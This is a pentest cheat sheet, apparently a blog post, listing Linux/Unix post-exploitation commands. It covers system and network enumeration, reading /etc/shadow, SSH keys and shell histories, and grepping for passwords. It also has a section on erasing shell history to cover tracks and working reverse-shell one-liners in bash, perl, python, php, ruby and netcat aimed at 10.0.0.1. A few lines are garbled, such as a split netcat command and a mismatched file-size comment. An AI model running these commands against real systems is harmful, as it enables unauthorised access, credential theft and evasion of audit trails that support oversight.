Linux/Unix pentest commands

I added some useful linux/unix commands for penetration testing.

1. Blind Files

(things to pull when all you can do is blindly read) LFI/dir traversal (Don’t forget ! :-P)

/etc/resolv.conf (everyone always has read on this and it wont trigger an IDS)
/etc/motd, /etc/issue
/etc/passwd

2. System

uname -a
ps aux
top -n 1 -b
id
arch
w
who -a
gcc -v
mysql --version
perl -v
ruby -v
python --version
df -k
mount
last -a
lastlog
lastlogin (*bsd)
getenforce
dmesg
lspci
lsusb
lshw
lshw -c network
free -m
cat /proc/cpuinfo
cat /proc/meminfo
du -h --max-depth=1 /
which nmap (see if it’s already installed)
locate bin/nmap
which nc (see if it’s already installed)
locate bin/<whatever you want>
whoami
jps -l
java -version

3. Networking

hostname -f
ip addr show
ifconfig -a
route -n
cat /etc/network/interfaces
iptables -L -n
iptables-save
netstat -anop
netstat -r
netstat -nltupw (root with raw sockets)
arp -a
lsof -nPi

4. Configs

ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/null
cat /etc/issue{,.net}
cat /etc/passwd
cat /etc/shadow (gotta try..)
cat /etc/shadow~ # (sometimes there when edited with gedit)
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
cat /etc/resolv.conf
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /opt/lampp/etc/httpd.conf
cat /etc/samba/smb.conf
cat /etc/openldap/ldap.conf
cat /etc/ldap/ldap.conf
pdbedit -L -w
pdbedit -L -v
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
cat /etc/exports
find /etc/sysconfig/ -type f -exec cat {} \;
cat /etc/sudoers

5. Determine Distro:

cat /etc/*release
/etc/SUSE-release                      # Novell SUSE        
/etc/redhat-release, /etc/redhat_version         # Red Hat
/etc/fedora-release                     # Fedora
/etc/slackware-release, /etc/slackware-version     # Slackware
/etc/debian_release, /etc/debian_version,         # Debian
/etc/mandrake-release                 # Mandrake
/etc/sun-release                     # Sun JDS
/etc/release                         # Solaris/Sparc
/etc/gentoo-release                     # Gentoo
/etc/lsb-release                     # ubuntu
??                            # arch linux
arch # on OpenBSD sample: OpenBSD.amd64
uname -a  (often hints at it pretty well)

6. Installed Packages

rpm -qa --last | head
yum list | grep installed
dpkg -l  
dpkg -l |grep -i “linux-image”
pkg_info         # FreeBSD

 

 7. Package Sources

cat /etc/apt/sources.list
ls -l /etc/yum.repos.d/
cat  /etc/yum.conf

8. Finding Important Files

find /var/log -type f -exec ls -la {} \;
ls -alhtr /mnt
ls -alhtr /media
ls -alhtr /tmp
ls -alhtr /home
cd /home/; tree
ls /home/*/.ssh/*
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
locate tar | grep [.]tar$
locate tgz | grep [.]tgz$
locate sql l grep [.]sql$
locate settings | grep [.]php$
locate config.inc | grep [.]php$
ls /home/*/id*
locate .properties | grep [.]properties # java config files
locate .xml | grep [.]xml # java/.net config files
find /sbin /usr/sbin /opt /lib `echo $PATH | ‘sed s/:/ /g’` -perm -4000 # find suids 
find / -type f -size +100M  // finding files that big than 400 M
grep -i -r 'password' /root/   //find password word in all files in all root sub directory

9. Covering Your Tracks

export HISTFILE=
rm -rf ~/.bash_history && ln -s ~/.bash_history /dev/null
<space> + command // dont save your command to history

10. Actions Per User

ls -alh /home/*/
ls -alh /home/*/.ssh/
cat /home/*/.ssh/authorized_keys
cat /home/*/.ssh/known_hosts
cat /home/*/.*hist*
find -type f /home/*/.vnc /home/*/.subversion
grep ^ssh /home/*/.*hist*
grep ^telnet `/home/*/.*hist*
grep ^mysql /home/*/.*hist*
cat /home/*/.viminfo
sudo -l # if sudoers is not readable, this sometimes works per user
crontab -l

11. Priv (sudo’d or as root)

ls -alh /root/
cat /etc/sudoers
cat /etc/shadow
cat /etc/master.passwd # OpenBSD
cat /var/spool/cron/crontabs/* | cat /var/spool/cron/*
lsof -nPi
ls /home/*/.ssh/*

12. Reverse Shell

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
perl -e 'use Socket;$i="10.0.0.1";$p=1234 socket(S,PF_INET,SOCK_STREAM, getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' nc -e /bin/sh 10

.0.0.1 1234 # note need -l on some versions, and many does NOT support -e anymore
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
xterm -display 10.0.0.1:1

• Listener-     Xnest :1
• Add permission to connect-  xhost +victimIP

## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES DOWN

-=SYSTEM=-
Command	Expected and / or Sample Output
uname -a	Linux kernel version, distribution
ps aux	List of running processes
id	List current user and group along with user/group id
w	Show about who is logged,they are doing
who -a	Print  information about about users

Others

> test.txt   // empty test.txt file
sed -n '5,10p' test.txt  // print to screen only from 5 to 10 line number 
sed -i 5d test.txt  //remove 5th line in test.txt file
sed -i 10,20d test.txt //remove between 5 and 10 line number